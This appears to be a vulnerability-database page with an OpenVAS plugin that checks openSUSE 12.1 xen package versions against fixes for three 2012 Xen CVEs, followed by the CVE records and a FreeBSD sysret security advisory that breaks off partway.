ID OPENVAS:850281 Type openvas Reporter Copyright (c) 2012 Greenbone Networks GmbH Modified 2017-12-27T00:00:00
Description
Check for the Version of xen
###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_suse_2012_0886_1.nasl 8249 2017-12-27 06:29:56Z teissa $
#
# SuSE Update for xen openSUSE-SU-2012:0886-1 (xen)
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
include("revisions-lib.inc");
# Metadata block: it runs only while the scanner collects plugin descriptions,
# registers the advisory texts and references, and then exits without touching
# the target.
if(description)
{
  # Identity and bookkeeping.
  script_id(850281);
  script_version("$Revision: 8249 $");
  script_tag(name:"creation_date", value:"2012-12-13 17:02:09 +0530 (Thu, 13 Dec 2012)");
  script_tag(name:"last_modification", value:"$Date: 2017-12-27 07:29:56 +0100 (Wed, 27 Dec 2017) $");
  script_name("SuSE Update for xen openSUSE-SU-2012:0886-1 (xen)");
  script_family("SuSE Local Security Checks");
  script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
  script_category(ACT_GATHER_INFO);

  # Advisory references and severity.
  # The 7.2 score and vector equal the CVSS v2 values this page lists for
  # CVE-2012-0217; CVE-2012-0218 and CVE-2012-2934 are listed at 1.9, so the
  # plugin carries the highest score of the three.
  script_cve_id("CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934");
  script_xref(name:"openSUSE-SU", value:"2012:0886_1");
  script_tag(name:"cvss_base", value:"7.2");
  script_tag(name:"cvss_base_vector", value:"AV:L/AC:L/Au:N/C:C/I:C/A:C");

  # Human-readable texts shown with a finding (strings kept verbatim).
  script_tag(name:"summary", value:"Check for the Version of xen");
  script_tag(name:"affected", value:"xen on openSUSE 12.1");
  script_tag(name:"insight", value:"This update of XEN fixed multiple security flaws that could
be exploited by local attackers to cause a Denial of
Service or potentially escalate privileges. Additionally,
several other upstream changes were backported.");
  script_tag(name:"solution", value:"Please Install the Updated Packages.");
  script_tag(name:"solution_type", value:"VendorFix");

  # qod_type "package": the verdict comes from comparing installed package
  # versions, not from probing the hypervisor itself.
  script_tag(name:"qod_type", value:"package");

  # Prerequisites: the check needs the package list gathered over an
  # authenticated SSH login on a SuSE target.
  script_dependencies("gather-package-list.nasl");
  script_mandatory_keys("ssh/login/suse", "ssh/login/rpms");

  exit(0);
}
include("pkg-lib-rpm.inc");
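# Authenticated package check for openSUSE-SU-2012:0886-1 (xen).
#
# Reads the release string from the knowledge base (presumably stored by the
# declared dependency gather-package-list.nasl) and compares every xen package
# named in the advisory against its fixed version with isrpmvuln().
#
# Reviewer notes for people reading the results:
# - All outdated packages are collected into ONE report. Stopping at the first
#   match hides the rest of the package set that still needs the update.
# - The verdict reflects the RPM database only. Installing the fixed xen
#   packages does not replace a hypervisor that is already running, so a host
#   can pass this check and still run the old Xen until it boots the updated
#   one. Confirm the running version separately.
# - CPU vendor is not considered. Per the CVE texts on this page,
#   CVE-2012-0217 concerns Intel processors and CVE-2012-2934 older AMD CPUs;
#   this check flags the host by package version alone.
# - debuginfo/debugsource/doc packages are checked as well; a hit on those
#   indicates an inconsistent package set rather than vulnerable code by itself.

release = get_kb_item("ssh/login/release");

# No release information means no authenticated package data: nothing to judge.
if(release == NULL){
  exit(0);
}

if(release == "openSUSE12.1")
{
  report = "";

  # Fixed versions in the "~"-separated form expected by the rpm: argument.
  # Kernel module packages (xen-kmp-*) carry the kernel version in theirs.
  fixed_xen = "4.1.2_17~1.10.1";
  fixed_kmp = "4.1.2_17_k3.1.10_1.16~1.10.1";

  # Same packages, same order as the advisory-generated check.
  advisory_pkgs = make_list(
    "xen-debugsource",
    "xen-devel",
    "xen-kmp-default",
    "xen-kmp-default-debuginfo",
    "xen-kmp-desktop",
    "xen-kmp-desktop-debuginfo",
    "xen-libs",
    "xen-libs-debuginfo",
    "xen-tools-domU",
    "xen-tools-domU-debuginfo",
    "xen",
    "xen-doc-html",
    "xen-doc-pdf",
    "xen-libs-32bit",
    "xen-libs-debuginfo-32bit",
    "xen-tools",
    "xen-tools-debuginfo",
    "xen-libs-debuginfo-x86",
    "xen-libs-x86",
    "xen-kmp-pae",
    "xen-kmp-pae-debuginfo"
  );

  foreach pkg_name (advisory_pkgs)
  {
    if("xen-kmp-" >< pkg_name)
      fixed = fixed_kmp;
    else
      fixed = fixed_xen;

    # isrpmvuln() yields NULL when the package is absent or already fixed,
    # otherwise the text describing the outdated package.
    if ((res = isrpmvuln(pkg:pkg_name, rpm:pkg_name + "~" + fixed, rls:"openSUSE12.1")) != NULL)
    {
      report += res;
    }
  }

  if(report != "")
  {
    security_message(data:report);
    exit(0);
  }

  # __pkg_match comes from pkg-lib-rpm.inc; presumably it is set once any of
  # the queried packages was found installed. Exit code 99 then marks the host
  # as checked and not vulnerable.
  if (__pkg_match) exit(99); # Not vulnerable.
  exit(0);
}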
{"id": "OPENVAS:850281", "type": "openvas", "bulletinFamily": "scanner", "title": "SuSE Update for xen openSUSE-SU-2012:0886-1 (xen)", "description": "Check for the Version of xen", "published": "2012-12-13T00:00:00", "modified": "2017-12-27T00:00:00", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=850281", "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "references": ["2012:0886_1"], "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "lastseen": "2018-01-02T10:58:15", "viewCount": 3, "enchantments": {"score": {"value": 8.2, "vector": "NONE", "modified": "2018-01-02T10:58:15", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:28131", "SECURITYVULNS:DOC:28207", "SECURITYVULNS:VULN:12411"]}, {"type": "nessus", "idList": ["CENTOS_RHSA-2012-0721.NASL", "OPENSUSE-2012-403.NASL", "SUSE_11_XEN-201206-120606.NASL", "ORACLEVM_OVMSA-2012-0022.NASL", "DEBIAN_DSA-2501.NASL", "SUSE_XEN-201206-8180.NASL", "FEDORA_2012-9430.NASL", "FEDORA_2012-9386.NASL", "FEDORA_2012-9399.NASL", "OPENSUSE-2012-404.NASL"]}, {"type": "suse", "idList": ["SUSE-SU-2012:0730-1", "OPENSUSE-SU-2012:0886-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310850281", "OPENVAS:136141256231071479", "OPENVAS:864599", "OPENVAS:1361412562310864599", "OPENVAS:864494", "OPENVAS:1361412562310864494", "OPENVAS:864509", "OPENVAS:1361412562310864509", "OPENVAS:870752", "OPENVAS:71479"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2508-1:4DE0E", "DEBIAN:DSA-2501-1:A44C3"]}, {"type": "fedora", "idList": ["FEDORA:00A04209F2", "FEDORA:8E44A20A90", "FEDORA:638FD21667", "FEDORA:63A4E21779", "FEDORA:A2013212DB", "FEDORA:0275A21469", "FEDORA:4C1E320FD7", "FEDORA:C1281214A6", "FEDORA:A80012051E", "FEDORA:403F220D9F"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-1061", 
"ELSA-2012-0721-1", "ELSA-2012-1061-1", "ELSA-2012-0721"]}, {"type": "centos", "idList": ["CESA-2012:0721"]}, {"type": "redhat", "idList": ["RHSA-2012:0720", "RHSA-2012:0721"]}, {"type": "cert", "idList": ["VU:649219"]}, {"type": "freebsd", "idList": ["AED44C4E-C067-11E1-B5E0-000C299B62E1"]}, {"type": "exploitdb", "idList": ["EDB-ID:46508", "EDB-ID:28718", "EDB-ID:20861"]}, {"type": "cisa", "idList": ["CISA:6C290D75BE52A220342D9856F873C16E"]}, {"type": "zdt", "idList": ["1337DAY-ID-32324"]}, {"type": "canvas", "idList": ["MS12_042", "SYSRET"]}, {"type": "threatpost", "idList": ["THREATPOST:D620254532F7EFC9F36DE3B4164B6875", "THREATPOST:A591D9D4EF6EA028B6F5C9C16D8FB392"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:152001"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/FREEBSD/LOCAL/INTEL_SYSRET_PRIV_ESC"]}, {"type": "mskb", "idList": ["KB2711167"]}], "modified": "2018-01-02T10:58:15", "rev": 2}, "vulnersScore": 8.2}, "pluginID": "850281", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2012_0886_1.nasl 8249 2017-12-27 06:29:56Z teissa $\n#\n# SuSE Update for xen openSUSE-SU-2012:0886-1 (xen)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"xen on openSUSE 12.1\";\ntag_insight = \"This update of XEN fixed multiple security flaws that could\n be exploited by local attackers to cause a Denial of\n Service or potentially escalate privileges. Additionally,\n several other upstream changes were backported.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_id(850281);\n script_version(\"$Revision: 8249 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-27 07:29:56 +0100 (Wed, 27 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-12-13 17:02:09 +0530 (Thu, 13 Dec 2012)\");\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"openSUSE-SU\", value: \"2012:0886_1\");\n script_name(\"SuSE Update for xen openSUSE-SU-2012:0886-1 (xen)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of xen\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n 
exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE12.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen-debugsource\", rpm:\"xen-debugsource~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xen-devel\", rpm:\"xen-devel~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xen-kmp-default\", rpm:\"xen-kmp-default~4.1.2_17_k3.1.10_1.16~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xen-kmp-default-debuginfo\", rpm:\"xen-kmp-default-debuginfo~4.1.2_17_k3.1.10_1.16~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xen-kmp-desktop\", rpm:\"xen-kmp-desktop~4.1.2_17_k3.1.10_1.16~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xen-kmp-desktop-debuginfo\", rpm:\"xen-kmp-desktop-debuginfo~4.1.2_17_k3.1.10_1.16~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xen-libs\", rpm:\"xen-libs~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xen-libs-debuginfo\", rpm:\"xen-libs-debuginfo~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xen-tools-domU\", rpm:\"xen-tools-domU~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xen-tools-domU-debuginfo\", rpm:\"xen-tools-domU-debuginfo~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if 
((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xen-doc-html\", rpm:\"xen-doc-html~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xen-doc-pdf\", rpm:\"xen-doc-pdf~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xen-libs-32bit\", rpm:\"xen-libs-32bit~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xen-libs-debuginfo-32bit\", rpm:\"xen-libs-debuginfo-32bit~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xen-tools\", rpm:\"xen-tools~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xen-tools-debuginfo\", rpm:\"xen-tools-debuginfo~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xen-libs-debuginfo-x86\", rpm:\"xen-libs-debuginfo-x86~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xen-libs-x86\", rpm:\"xen-libs-x86~4.1.2_17~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xen-kmp-pae\", rpm:\"xen-kmp-pae~4.1.2_17_k3.1.10_1.16~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xen-kmp-pae-debuginfo\", rpm:\"xen-kmp-pae-debuginfo~4.1.2_17_k3.1.10_1.16~1.10.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "naslFamily": "SuSE Local Security 
Checks"}
{"cve": [{"lastseen": "2020-10-03T12:06:05", "description": "Xen 4.0, and 4.1, when running a 64-bit PV guest on \"older\" AMD CPUs, does not properly protect against a certain AMD processor bug, which allows local guest OS users to cause a denial of service (host hang) via sequential execution of instructions across a non-canonical boundary, a different vulnerability than CVE-2012-0217.", "edition": 3, "cvss3": {}, "published": "2012-12-03T21:55:00", "title": "CVE-2012-2934", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2934"], "modified": "2014-05-05T05:11:00", "cpe": ["cpe:/o:xen:xen:4.1.0", "cpe:/o:xen:xen:4.0.0"], "id": "CVE-2012-2934", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2934", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:xen:xen:4.1.0:-:*:*:*:*:x64:*", "cpe:2.3:o:xen:xen:4.0.0:-:*:*:*:*:x64:*"]}, {"lastseen": "2020-10-03T12:05:59", "description": "Xen 3.4, 4.0, and 4.1, when the guest OS has not registered a handler for a syscall or sysenter instruction, does not properly clear a flag for exception injection when injecting a General Protection Fault, which allows local PV guest OS users to cause a denial of service (guest crash) by later triggering an exception that would normally be handled within Xen.", "edition": 3, "cvss3": {}, "published": "2012-12-03T21:55:00", "title": "CVE-2012-0218", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": 
"LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0218"], "modified": "2013-10-11T03:40:00", "cpe": ["cpe:/o:xen:xen:3.4.0", "cpe:/o:xen:xen:4.1.0", "cpe:/o:xen:xen:4.0.0"], "id": "CVE-2012-0218", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0218", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:xen:xen:3.4.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.0.0:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:47:15", "description": "The x86-64 kernel system-call functionality in Xen 4.1.2 and earlier, as used in Citrix XenServer 6.0.2 and earlier and other products; Oracle Solaris 11 and earlier; illumos before r13724; Joyent SmartOS before 20120614T184600Z; FreeBSD before 9.0-RELEASE-p3; NetBSD 6.0 Beta and earlier; Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1; and possibly other operating systems, when running on an Intel processor, incorrectly uses the sysret path in cases where a certain address is not a canonical address, which allows local users to gain privileges via a crafted application. NOTE: because this issue is due to incorrect use of the Intel specification, it should have been split into separate identifiers; however, there was some value in preserving the original mapping of the multi-codebase coordinated-disclosure effort to a single identifier.\nPer: http://technet.microsoft.com/en-us/security/bulletin/ms12-042\n\n'This vulnerability only affects Intel x64-based versions of Windows 7 and Windows Server 2008 R2. 
Systems with AMD or ARM-based CPUs are not affected by this vulnerability.'", "edition": 6, "cvss3": {}, "published": "2012-06-12T22:55:00", "title": "CVE-2012-0217", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0217"], "modified": "2020-09-28T12:58:00", "cpe": ["cpe:/o:xen:xen:4.1.1", "cpe:/o:xen:xen:4.0.3", "cpe:/o:xen:xen:4.0.4", "cpe:/a:citrix:xenserver:6.0.2", "cpe:/a:citrix:xenserver:6.0", "cpe:/o:microsoft:windows_server_2003:*", "cpe:/o:xen:xen:4.0.1", "cpe:/o:netbsd:netbsd:6.0", "cpe:/o:xen:xen:4.0.2", "cpe:/o:xen:xen:4.1.0", "cpe:/o:sun:sunos:5.11", "cpe:/o:xen:xen:4.0.0", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_xp:*", "cpe:/o:xen:xen:4.1.2", "cpe:/o:freebsd:freebsd:9.0", "cpe:/o:joyent:smartos:20120614", "cpe:/o:microsoft:windows_7:*", "cpe:/o:illumos:illumos:r13723"], "id": "CVE-2012-0217", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0217", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:freebsd:freebsd:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:citrix:xenserver:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:x64:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:sp3:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:*:x64:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2003:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:*:x64:*:*:*:*:*", 
"cpe:2.3:o:illumos:illumos:r13723:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.11:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:citrix:xenserver:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:joyent:smartos:20120614:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:6.0:beta:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:44", "bulletinFamily": "software", "cvelist": ["CVE-2012-0217"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n=============================================================================\r\nFreeBSD-SA-12:04.sysret Security Advisory\r\n The FreeBSD Project\r\n\r\nTopic: Privilege escalation when returning from kernel\r\n\r\nCategory: core\r\nModule: sys_amd64\r\nAnnounced: 2012-06-12\r\nCredits: Rafal Wojtczuk, John Baldwin\r\nAffects: All supported versions of FreeBSD\r\nCorrected: 2012-06-12 12:10:10 UTC (RELENG_7, 7.4-STABLE)\r\n 2012-06-12 12:10:10 UTC (RELENG_7_4, 7.4-RELEASE-p9)\r\n 2012-06-12 12:10:10 UTC (RELENG_8, 8.3-STABLE)\r\n 2012-06-12 12:10:10 UTC (RELENG_8_3, 8.3-RELEASE-p3)\r\n 2012-06-12 12:10:10 UTC (RELENG_8_2, 8.2-RELEASE-p9)\r\n 2012-06-12 12:10:10 UTC (RELENG_8_1, 8.1-RELEASE-p11)\r\n 2012-06-12 12:10:10 UTC (RELENG_9, 9.0-STABLE)\r\n 2012-06-12 12:10:10 UTC (RELENG_9_0, 9.0-RELEASE-p3)\r\nCVE Name: CVE-2012-0217\r\n\r\nFor general information regarding FreeBSD Security Advisories,\r\nincluding descriptions of the fields above, security branches, and the\r\nfollowing sections, please visit <URL:http://security.FreeBSD.org/>.\r\n\r\nI. 
Background\r\n\r\nThe FreeBSD operating system implements a rings model of security, where\r\nprivileged operations are done in the kernel, and most applications\r\nrequest access to these operations by making a system call, which puts\r\nthe CPU into the required privilege level and passes control to the\r\nkernel.\r\n\r\nII. Problem Description\r\n\r\nFreeBSD/amd64 runs on CPUs from different vendors. Due to varying\r\nbehaviour of CPUs in 64 bit mode a sanity check of the kernel may be\r\ninsufficient when returning from a system call.\r\n\r\nIII. Impact\r\n\r\nSuccessful exploitation of the problem can lead to local kernel privilege\r\nescalation, kernel data corruption and/or crash.\r\n\r\nTo exploit this vulnerability, an attacker must be able to run code with user\r\nprivileges on the target system.\r\n\r\nIV. Workaround\r\n\r\nNo workaround is available.\r\n\r\nHowever FreeBSD/amd64 running on AMD CPUs is not vulnerable to this\r\nparticular problem.\r\n\r\nSystems with 64 bit capable CPUs, but running the 32 bit FreeBSD/i386\r\nkernel are not vulnerable, nor are systems running on different\r\nprocessor architectures.\r\n\r\nV. 
Solution\r\n\r\nPerform one of the following:\r\n\r\n1) Upgrade your vulnerable system to 7-STABLE, 8-STABLE, or 9-STABLE,\r\nor to the RELENG_7_4, RELENG_8_3, RELENG_8_2, RELENG_8_1, or RELENG_9_0\r\nsecurity branch dated after the correction date.\r\n\r\n2) To update your vulnerable system via a source code patch:\r\n\r\nThe following patches have been verified to apply to FreeBSD 7.4,\r\n8.3, 8.2, 8.1 and 9.0 systems.\r\n\r\na) Download the relevant patch from the location below, and verify the\r\ndetached PGP signature using your PGP utility.\r\n\r\n# fetch http://security.FreeBSD.org/patches/SA-12:04/sysret.patch\r\n# fetch http://security.FreeBSD.org/patches/SA-12:04/sysret.patch.asc\r\n\r\nb) Apply the patch.\r\n\r\n# cd /usr/src\r\n# patch < /path/to/patch\r\n\r\nc) Recompile your kernel as described in\r\n<URL:http://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the\r\nsystem.\r\n\r\n3) To update your vulnerable system via a binary patch:\r\n\r\nSystems running 7.4-RELEASE, 8.3-RELEASE, 8.2-RELEASE, 8.1-RELEASE,\r\nor 9.0-RELEASE on the i386 or amd64 platforms can be updated via the\r\nfreebsd-update(8) utility:\r\n\r\n# freebsd-update fetch\r\n# freebsd-update install\r\n\r\nVI. 
Correction details\r\n\r\nThe following list contains the revision numbers of each file that was\r\ncorrected in FreeBSD.\r\n\r\nCVS:\r\n\r\nBranch Revision\r\n Path\r\n- -------------------------------------------------------------------------\r\nRELENG_7\r\n src/sys/amd64/amd64/trap.c 1.319.2.14\r\nRELENG_7_4\r\n src/UPDATING 1.507.2.36.2.11\r\n src/sys/conf/newvers.sh 1.72.2.18.2.14\r\n src/sys/amd64/amd64/trap.c 1.319.2.12.2.2\r\nRELENG_8\r\n src/sys/amd64/amd64/trap.c 1.332.2.24\r\nRELENG_8_3\r\n src/UPDATING 1.632.2.26.2.5\r\n src/sys/conf/newvers.sh 1.83.2.15.2.7\r\n src/sys/amd64/amd64/trap.c 1.332.2.21.2.2\r\nRELENG_8_2\r\n src/UPDATING 1.632.2.19.2.11\r\n src/sys/conf/newvers.sh 1.83.2.12.2.14\r\n src/sys/amd64/amd64/trap.c 1.332.2.14.2.2\r\nRELENG_8_1\r\n src/UPDATING 1.632.2.14.2.14\r\n src/sys/conf/newvers.sh 1.83.2.10.2.15\r\n src/sys/amd64/amd64/trap.c 1.332.2.10.2.2\r\nRELENG_9\r\n src/sys/amd64/amd64/trap.c 1.357.2.9\r\nRELENG_9_0\r\n src/UPDATING 1.702.2.4.2.5\r\n src/sys/conf/newvers.sh 1.95.2.4.2.7\r\n src/sys/amd64/amd64/trap.c 1.357.2.2.2.3\r\n- -------------------------------------------------------------------------\r\n\r\nSubversion:\r\n\r\nBranch/path Revision\r\n- -------------------------------------------------------------------------\r\nstable/7/ r236953\r\nreleng/7.4/ r236953\r\nstable/8/ r236953\r\nreleng/8.3/ r236953\r\nreleng/8.2/ r236953\r\nreleng/8.1/ r236953\r\nstable/9/ r236953\r\nreleng/9.0/ r236953\r\n- -------------------------------------------------------------------------\r\n\r\nVII. 
